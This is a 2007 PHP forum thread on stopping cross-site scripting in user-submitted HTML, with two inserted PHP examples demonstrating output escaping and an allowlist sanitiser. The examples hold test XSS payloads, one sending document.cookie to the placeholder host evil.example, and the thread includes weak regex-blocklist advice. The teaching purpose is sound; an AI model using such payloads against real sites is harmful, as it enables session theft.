pocobueno1388 Posted August 27, 2007

I am trying to keep security in mind before I start a large project, so I have a quick question. I understand that it isn't safe to allow users to input HTML or any code into the database. My question is, if I use htmlentities() on all input where the user is allowed to use code that will be inserted into the database, will that keep away malicious JavaScript code? Obviously when I want to display this information from the database I will use html_entity_decode(), but won't that just change it back from HTML entities to normal HTML again? If it does that, doesn't that mean that the code will still be executed, and I would still be vulnerable to the attacks that are in the code? Maybe this is the reason BBCode was created? If I don't have to use it though, I would rather not.
Jessica Posted August 27, 2007

You are correct. You can use one of the many libraries out there for cleaning HTML if you want to allow it and still prevent XSS attacks. Check out this page: http://htmlpurifier.org/comparison.html

PS: You'd be surprised how many big sites are vulnerable to XSS. buy.com still is.
Dragen Posted August 27, 2007

Just use mysql_real_escape_string($value); on everything you put into a database. When you output it use: htmlentities($value)

htmlentities changes everything to its ASCII code, such as & = &amp;
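An added example (my code, not code posted in the thread) that puts the question and this reply side by side: the htmlentities() -> store -> html_entity_decode() round trip hands the browser exactly what the user typed, so the alternative is to store the raw text, keep the SQL escaping and the HTML escaping separate, and escape for HTML only at the moment the value is printed. The `profiles` table, its columns and the sample bio are made up for the demo; it assumes the pdo_sqlite extension.

```php
<?php
// Added example, not code from the thread. Shows (1) that encoding before
// INSERT and decoding after SELECT restores the attacker's payload unchanged,
// and (2) storing raw text with a prepared statement and escaping on output.
// Table/column names are invented for the demo.
declare(strict_types=1);

// Constructed sample input: a profile text a hostile user might submit.
const HOSTILE_BIO = "Tom & Jerry <script>alert(document.cookie)</script> \"quoted\" O'Brien";

// 1. What the question proposes: encode before INSERT, decode after SELECT.
function roundTrip(string $input): string
{
    $stored = htmlentities($input, ENT_QUOTES, 'UTF-8');      // value written to the DB
    return html_entity_decode($stored, ENT_QUOTES, 'UTF-8');  // value echoed into the page
}

// 2a. SQL context: a prepared statement keeps the raw text out of the query
//     string, which is the job mysql_real_escape_string() used to do
//     (that function was removed in PHP 7.0).
function insertBio(PDO $db, int $userId, string $rawBio): void
{
    $stmt = $db->prepare('INSERT INTO profiles (user_id, bio) VALUES (:uid, :bio)');
    $stmt->execute([':uid' => $userId, ':bio' => $rawBio]);
}

function loadBio(PDO $db, int $userId): string
{
    $stmt = $db->prepare('SELECT bio FROM profiles WHERE user_id = :uid');
    $stmt->execute([':uid' => $userId]);
    $bio = $stmt->fetchColumn();
    return $bio === false ? '' : (string) $bio;
}

// 2b. HTML context: escape at output time. ENT_QUOTES also encodes the single
//     quote so the value is safe inside single-quoted attributes; ENT_SUBSTITUTE
//     stops an invalid UTF-8 sequence from turning the whole output into "".
function escapeForHtml(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Demo against an in-memory SQLite database (assumes the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE profiles (user_id INTEGER PRIMARY KEY, bio TEXT)');
insertBio($db, 42, HOSTILE_BIO);

// Round trip: the decoded value is byte-for-byte the original payload,
// <script> tag included.
var_dump(roundTrip(HOSTILE_BIO) === HOSTILE_BIO);

// Store raw, escape on output: the <script> reaches the browser as inert text,
// and the raw copy is still available for search, editing or a later sanitiser.
$raw = loadBio($db, 42);
var_dump($raw === HOSTILE_BIO);
echo '<p class="bio">' . escapeForHtml($raw) . "</p>\n";
```

The two escapes are for two different contexts and neither substitutes for the other: the SQL one (or a prepared statement) only protects the query, the HTML one only protects the page. htmlspecialchars() is enough for output when the page declares its charset; htmlentities() additionally encodes every non-ASCII character, which is harmless but not needed for XSS. This pattern only helps when the user is *not* allowed to keep any markup; for the "decorate your page with HTML" case the original poster wants, see the allowlist example further down.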
dbo Posted August 27, 2007

Decoding it will in fact make you susceptible again. You could do a regular expression search/replace to remove any script tags... because there really isn't a need to allow users to enter in JavaScript to begin with. If you find any occurrences you may consider logging it so that you can see what malicious users were trying to do. Or you could replace < and > with ( and ) on script tags and output it as text... but that's kind of ugly. Really depends on your situation. Can you provide some more insight?
Jessica Posted August 27, 2007

If you want to remove any HTML, use strip_tags(). If you want to allow "safe" html, check out the page above.
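An added example (my code, not from the thread and not from HTML Purifier or htmLawed) that runs a few constructed payloads through the two blocklist ideas raised in the last two replies, a regex that removes `<script>` tags and strip_tags() with some tags kept, and through a small allowlist sanitiser built on PHP's ext/dom, which is the shape of what the purifier libraries do. The allowed tag and attribute lists are illustrative choices, `evil.example` is a placeholder host, and ext/dom must be loaded.

```php
<?php
// Added example, not code from the thread or from any purifier library.
// Compares two blocklist approaches with a DOM-based allowlist sanitiser.
// Tag/attribute lists are illustrative; evil.example is a placeholder host.
declare(strict_types=1);

// Constructed payloads; only the last one uses a <script> tag.
const PAYLOADS = [
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
    '<a href="java&#09;script:alert(1)">tab inside the scheme</a>',
    '<b onmouseover="alert(1)">bold</b>',
    '<p>Hi &amp; welcome <script>new Image().src="http://evil.example/?"+document.cookie</script></p>',
];

// Idea 1 from the thread: strip <script>...</script> with a regex.
// Only the last payload contains one; the other four pass through untouched.
function stripScriptTags(string $html): string
{
    return preg_replace('#<script\b[^>]*>.*?</script\s*>#is', '', $html) ?? '';
}

// Idea 2: strip_tags() with an allowlist of tags. Attributes on the kept tags,
// event handlers and javascript: URLs included, pass through untouched.
function stripTagsKeepingSome(string $html): string
{
    return strip_tags($html, '<a><b><i><p><img>');
}

// Idea 3: parse, then keep only known elements, known attributes and safe URLs.
function sanitize(string $html): string
{
    $allowed = ['a' => ['href'], 'b' => [], 'i' => [], 'p' => [], 'img' => ['src', 'alt']];

    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);             // hostile input is rarely well formed
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>',
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $root = $doc->getElementsByTagName('div')->item(0);
    if ($root === null) {
        return '';
    }
    cleanNode($root, $allowed);

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);                   // re-serialised, so text is re-escaped
    }
    return $out;
}

function cleanNode(DOMNode $node, array $allowed): void
{
    // Iterate over a snapshot: replacing or removing children mutates the live list.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!isset($allowed[$tag])) {
                // Unknown element: drop it but keep its text, so a script body becomes inert text.
                $node->replaceChild($node->ownerDocument->createTextNode($child->textContent), $child);
                continue;
            }
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name  = strtolower($attr->name);
                $isUrl = in_array($name, ['href', 'src'], true);
                if (!in_array($name, $allowed[$tag], true) || ($isUrl && !isSafeUrl($attr->value))) {
                    $child->removeAttribute($attr->name);
                }
            }
            cleanNode($child, $allowed);
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);                   // comments, processing instructions
        }
    }
}

function isSafeUrl(string $url): bool
{
    // Browsers ignore tabs and newlines inside a URL and strip leading control
    // characters, so "java\tscript:" still runs as javascript:. Test with those removed.
    $probe = preg_replace('/[\x00-\x20\x7f]+/', '', $url) ?? '';
    if (!preg_match('#^[a-z][a-z0-9+.-]*:#i', $probe)) {
        return true;                                      // no scheme: relative URL
    }
    return (bool) preg_match('#^https?:#i', $probe);      // javascript:, data:, vbscript: ... rejected
}

foreach (PAYLOADS as $p) {
    printf("input      : %s\nregex      : %s\nstrip_tags : %s\nallowlist  : %s\n\n",
           $p, stripScriptTags($p), stripTagsKeepingSome($p), sanitize($p));
}
```

The regex and strip_tags() lines leave the first four payloads executable because none of them needs a `<script>` tag; the allowlist keeps the elements and drops the event handlers and the two `javascript:` hrefs, and turns the script body into plain text. This toy covers the principle only: it knows nothing about CSS in `style` attributes, about `<base>`, about nested-quote tricks in old Internet Explorer, or about keeping the output standards-compliant, which is the work HTML Purifier and htmLawed do for you. With HTML Purifier the equivalent call is `$clean = (new HTMLPurifier(HTMLPurifier_Config::createDefault()))->purify($dirty);`, run on the raw stored value at output time (or once at input time, if you also store the clean copy).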
pocobueno1388 (author) Posted August 27, 2007

Jesirose, looks like that is exactly what I am looking for =] I will check it out. I don't want to NOT allow HTML, I would like the users of my site to be able to use HTML to "decorate" their personal pages. I just want to make sure I'm protected from the XSS attacks mostly.

Wow, how could buy.com not be protected? 0_0 You would think they would have enough money to get it done...

Okay, I'm gonna check out that site, then I will be back to report the thread as solved if it's what I'm looking for. If anyone else has any suggestions, please share.
Jessica Posted August 27, 2007

Yeah, and if you TELL buy.com or one of the other large sites, they threaten to prosecute you for attempted hacking. Don't get me started on these morons.
pocobueno1388 (author) Posted August 27, 2007

Thanks jesirose, the library is perfect =]

Yeah, let's definitely not get started on that, I can already tell they are a bunch of morons. They will be forced to secure it sooner or later, and if they don't, we will just sit back and watch their empire fall =] I'm speaking from not much knowledge on just how vulnerable they are, but not being protected from those attacks couldn't be a good thing.

Anyways, thanks again xD I'm assuming that this library will catch JavaScript as well?
pocobueno1388 (author) Posted August 27, 2007

Nevermind, it looks like it covers malicious JavaScript as well =] The name threw me off: "HTML Purifier".
alpha2zee Posted November 7, 2007

For filtering input, one may also think of using htmLawed (http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php), a highly customizable, 45 kB, single-file, non-OOP PHP script to filter and purify HTML. Besides restricting tags/elements, attributes and URL protocols as per one's specification, and balancing HTML tags and ensuring valid tag nesting/well-formedness, it also has good anti-XSS and anti-spam measures.
pocobueno1388 (author) Posted November 7, 2007

Thanks for your input... but this thread is 2 months old, and has been solved. No need to bring it back from the dead =]
revraz Posted November 7, 2007

Quoting Jessica: "Yeah, and if you TELL buy.com or one of the other large sites, they threaten to prosecute you for attempted hacking. Don't get me started on these morons."

I can see their building here from my office, maybe I'll walk over there and tell them face to face.